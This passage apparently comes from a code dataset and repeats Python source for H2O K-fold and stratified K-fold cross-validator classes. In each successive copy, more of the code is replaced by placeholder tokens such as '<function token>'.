Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n 
----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n <function token>\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n <function token>\n <function token>\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = 
frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in 
range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n 
return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass H2OKFold(_H2OBaseKFold):\n <docstring token>\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, 
